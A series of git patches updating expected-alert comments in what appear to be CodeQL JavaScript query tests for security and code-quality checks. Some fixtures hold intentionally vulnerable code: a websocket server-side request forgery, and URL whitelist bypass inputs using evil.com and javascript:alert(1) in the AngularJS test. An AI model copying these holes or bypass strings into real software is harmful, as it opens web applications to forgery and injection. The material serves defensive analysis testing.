16:52:45 +0100 Subject: [PATCH 119/892] JS: Accept to web socket-based SSRF alerts --- javascript/ql/test/query-tests/Security/CWE-918/serverSide.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 777f7eb00840..a6a863860c79 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -106,7 +106,7 @@ import * as ws from 'ws'; new ws.Server({ port: 8080 }).on('connection', function(socket, request) { socket.on('message', function(message) { const url = request.url; - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); @@ -114,7 +114,7 @@ new ws.Server({ port: 8080 }).on('connection', function (socket, request) { socket.on('message', function (message) { const url = new URL(request.url, base); const target = new URL(url.pathname, base); - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); From e634b31c2780ee2baa16a28a46e64c4b97bc3379 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:58:30 +0100 Subject: [PATCH 120/892] JS: Accept some UselessConditional alerts --- .../UselessConditional/UselessConditional.js | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index d698b7d1c29e..a629ae06320d 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -2,32 +2,32 @@ function getLastLine(input) { var lines = [], nextLine; while ((nextLine = readNextLine(input))) lines.push(nextLine); - if (!lines) + if (!lines) // $ Alert throw new Error("No lines!"); return lines[lines.length-1]; } function lookup(cache, k) { var v; - return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); + return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); // $ Alert } function test(a, b) { if (!a && !b) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } if (!(a || b)) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } var x = new X(); - if(x){} - if (new X()){} - if((x)){} - if(((x))){} - if ((new X())){} + if(x){} // $ Alert + if (new X()){} // $ Alert + if((x)){} // $ Alert + if(((x))){} // $ Alert + if ((new X())){} // $ Alert x = 0n; if (x) // $ Alert @@ -51,7 +51,7 @@ async function awaitFlow(){ var known = knownF(); if (known) return; - if (known) + if (known) // $ Alert return; var unknown = unknownF(); @@ -86,7 +86,7 @@ async function awaitFlow(){ }); (function() { - if ((x, true)); + if ((x, true)); // $ Alert }); (function (x, y) { From 507a0918ad68dc79025ca220b165089e317d1a39 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:00:09 +0100 Subject: [PATCH 121/892] JS: More alert updates in UselessConditional --- .../UselessConditional/UselessConditional.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index a629ae06320d..edba36470508 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -67,7 +67,7 @@ async function awaitFlow(){ (function() { function f1(x) { - x || y // $ Alert - but whitelisted + x || y // OK } f1(true); @@ -79,7 +79,7 @@ async function awaitFlow(){ function f3(x) { (function(){ - x || y // $ Alert - but whitelisted + x || y // OK }); } f3(true); @@ -150,7 +150,7 @@ async function awaitFlow(){ var v = p(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -165,7 +165,7 @@ async function awaitFlow(){ var v = findOrThrow(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -180,7 +180,7 @@ async function awaitFlow(){ (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // $ Alert - but whitelisted + if (!x && something()) { // OK something(); } }); From 7623ebb13bf67dcd925881a0344f6a5d69d8fa24 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:01:07 +0100 Subject: [PATCH 122/892] JS: Accept changes in UseOfReturnlessFunction --- .../query-tests/Statements/UseOfReturnlessFunction/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7f4296932d96..37da0c7e2a6a 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -21,7 +21,7 @@ var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. - var b = onlySideEffects(); + var b = onlySideEffects(); // $ Alert console.log(b); var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert + var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert console.log(e); function onlySideEffects2() { From 6cf1334c6d6df6149aca85d5945983af69377c12 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 08:59:27 +0100 Subject: [PATCH 123/892] Fix comment style in UnboundEventHandlerReceiver --- .../Expressions/UnboundEventHandlerReceiver/tst.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index e129865af56f..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -24,9 +24,9 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // $ Alert -
    // $ Alert -
    // $ Alert +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    { /* $ Alert */ }
    From 2b33ed367167bb4f91d160c8642f269ed06e47f3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:17:03 +0100 Subject: [PATCH 124/892] JS: Remove incorrect alert marker --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index b5a8481305e9..5e8bc71a92ff 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // $ Alert - explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, From a1c13f02be912a59eeaf5b61120436ecb20dc20c Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:19:27 +0100 Subject: [PATCH 125/892] JS: Remove alert marker that's reported on another line We had two 'NOT OK' comments for the same alert. The alert appears on the 'pref' object above. --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e8bc71a92ff..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -26,7 +26,7 @@ function test() { sandbox: true }; // $ Alert - var options_2 = { // $ Alert - implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, From dc28bb527bbe2852dfd702e0bf65b4684a02436e Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:21:41 +0100 Subject: [PATCH 126/892] JS: Fix alert location and use RelatedLocation in InsecureUrlWhitelist --- .../AngularJS/InsecureUrlWhitelist/tst.js | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 6ede37fed7cc..1ee742c6d6a2 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,11 +1,11 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a - "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com - "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD "https://example.com", "https://example.com/**", @@ -19,6 +19,6 @@ angular.module('myApp', []) "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // $ Alert - (exploit http://wwwaexample.org (dots are not escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); From 605999454acf161f3056967f5e00d4b9d5d95e17 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 12:52:06 +0100 Subject: [PATCH 127/892] JS: Accept more results in SpuriousArguments --- .../LanguageFeatures/SpuriousArguments/reflection.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 41f312bd0791..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -4,7 +4,7 @@ function f1(x) {return;} f0.call(); f0.call(this); f0.call(this, 1); // $ Alert -f0.call(this, 1, 2); +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); From 87ed86e4fdb3e8af624a9ad7c27a8be9462550ab Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 17:12:53 +0100 Subject: [PATCH 128/892] JS: Update UnusedOrUndefinedStateProperty Using RelatedLocations to add clarity --- .../Expressions/ImplicitOperandConversion/tst.js | 2 +- .../test/query-tests/Expressions/MissingAwait/tst.js | 2 +- .../Expressions/SuspiciousInvocation/eval.js | 2 +- .../LanguageFeatures/IllegalInvocation/tst.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/issue7506.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/undefined.js | 10 +++++----- .../React/UnusedOrUndefinedStateProperty/unused.js | 10 +++++----- 7 files changed, 17 insertions(+), 17 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index fe1e7d6924b0..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -74,7 +74,7 @@ function l() { x ** 2; // $ Alert } -1n + 1; // $ MISSED: Alert +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 28e95513d401..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -59,7 +59,7 @@ function useThingPossiblySync(b) { if (thing == null) {} - return thing + "bar"; // $ MISSED: Alert + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index 2cf1e74a33eb..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -6,7 +6,7 @@ function foo() { function bar() { var g; - g(); // $ MISSED: Alert + g(); // $ MISSING: Alert eval("g = alert"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 1ffb7a489c8e..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -12,7 +12,7 @@ let c = new C(); C(); // $ Alert new (x=>x); // $ Alert c.m(); -new c.m(); // $ MISSED: Alert +new c.m(); // $ MISSING: Alert var o = { f: function() {}, @@ -21,7 +21,7 @@ var o = { o.f(); new o.f(); o.g(); -new o.g(); // $ MISSED: Alert +new o.g(); // $ MISSING: Alert function f(b) { var g; diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index afc4f61b083c..96ffb02f8b0b 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,12 +1,12 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); this.state.writtenInOtherMethod; - this.state.notWritten; // $ Alert - this.state.notWrittenButReadInChain; // $ Alert + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation this.state.writtenDirectly; this.state.writtenInSetState; @@ -29,10 +29,10 @@ class C2 extends React.Component { } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.writtenThrougExternalPropertyAccess; - this.state.notWrittenThrougExternalPropertyAccess; // $ Alert + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d2ff35967673..9c4e5441167a 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.readDirectly = 42; this.state.readInChain = {}; this.state.readInOtherMethod = {}; - this.state.notRead = 42; // $ Alert + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ Alert + this.state.readWhenEscaped = 42; // $ MISSING: Alert f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.readThrougExternaPropertyAccess = 42; - this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } From 8ef51c495fd22fab4ff2315944151073830d4888 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:24 +0100 Subject: [PATCH 129/892] JS: Fix wrong expectation in UnusedOrUndefinedStateProperty --- .../query-tests/React/UnusedOrUndefinedStateProperty/unused.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index 9c4e5441167a..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ MISSING: Alert + this.state.readWhenEscaped = 42; f(this.state); } } From aade1e863d82329042550215a83ed3e53f392e6b Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:38 +0100 Subject: [PATCH 130/892] JS: Add a related location in UnusedOrUndefinedStateProperty --- .../React/UnusedOrUndefinedStateProperty/undefined.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 96ffb02f8b0b..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -61,7 +61,7 @@ new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ // $ Alert render: function() { this.state.writtenInKnownInitializerObject; - this.state.notWrittenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
    ; }, getInitialState: function() { From 0496de6c8f9c561182cb0b46fa3ee3ac19c0183d Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:29 +0100 Subject: [PATCH 131/892] JS: Accept alerts in UselessCharacterEscape --- .../UselessCharacterEscape/tst-escapes.js | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 3df355052a55..f776c9d40e68 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -10,12 +10,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert RegExp("\[\]\'\\,\.\/"); // $ Alert -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; @@ -57,17 +57,17 @@ RegExp("[\.]"); // $ Alert RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert From bb67a0e9b09175c4a56fb1bd0ec40ccfdc46685e Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:53 +0100 Subject: [PATCH 132/892] JS: Remove outdated comment --- .../UselessCharacterEscape.expected | 118 +++++++++--------- .../UselessCharacterEscape/tst-escapes.js | 2 - 2 files changed, 59 insertions(+), 61 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected @@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | 